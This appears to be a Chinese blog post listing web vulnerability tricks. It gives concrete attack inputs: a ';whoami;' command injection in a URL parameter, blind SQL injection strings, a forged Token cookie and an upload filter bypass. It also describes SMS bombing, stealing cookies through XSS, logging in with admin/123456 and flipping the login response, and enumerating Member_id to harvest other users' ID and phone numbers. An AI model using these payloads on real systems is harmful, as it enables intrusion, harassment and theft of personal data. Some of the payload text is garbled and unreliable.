web漏洞的一些方法

• 短信轰炸  burp一直repeat
• ueditor是否存在已知漏洞1.4.3.3文件上传漏洞
• structs 漏洞检查工具
• 一些post 或者get请求的burp响应包中 查找pass 看是否有密码泄露
• 构造指定cookie 访问系统,通过数据接口获取数据
• 看逐步删除cookie 是否话可以获得数据  直到删除token
再构造token 
Cookie: Token=1,1 ASP.NET_SessionId=; rmbUsername=false; .ASPXAUTH=; Token=1,1
• 协众OA系统是否存在任意文件上传
• 用户管理->新建账号,姓名、固定电话、个人描述处均可插入XSS
  获取cookie 
• cookie中未加httponly,攻击者可利用xss漏洞获取到用户明文账号密码。
	httponly 来防止XSS攻击
• 任意命令执行
ip/diagnostics/cmd.php?action=arping&host=8.8.8.8&count=4&ifName=1&src=1;whoami; 
• 防火墙弱口令
利用ssh 登陆防火墙  ssh root@ip
• 通过修改pathContext字段里的路径可以浏览目录结构与目录下文件es.page?pathContext=D:@rums@creatorCMS@eWebEditor@template@@
• 正常情况下springmvc的xml文件应放在WEB-INF下
• weblogic漏洞  漏洞利用工具

试使用admin/123456登录,修改返回包false为true,登录进系统内
遍历cookie中Member_id可获取他人姓名、身份证号、手机号码等个人信息
登陆成功之后可以遍历 平行越权
• 获取(ip)ml?id=7430’and+substr(user(), 1 1 1,1)=’ a a a 爆破来获取数据库名 burp
• User-Agent: Mozilla/5.0
• BURP抓包,在图片内容后面加上,以及后缀改为.jpg.h?tml,成功上传,得到地址
• Personal='or’a’like’b sql注入
• 知道一个普通用户的信息,可以爆破撞库获取弱口令。 只需要设置学号的后几位为递增便可
• ?DocumentNum='and+user+like’a&
'or+substr(user,3,1)='T

你可能感兴趣的:(漏洞笔记整理)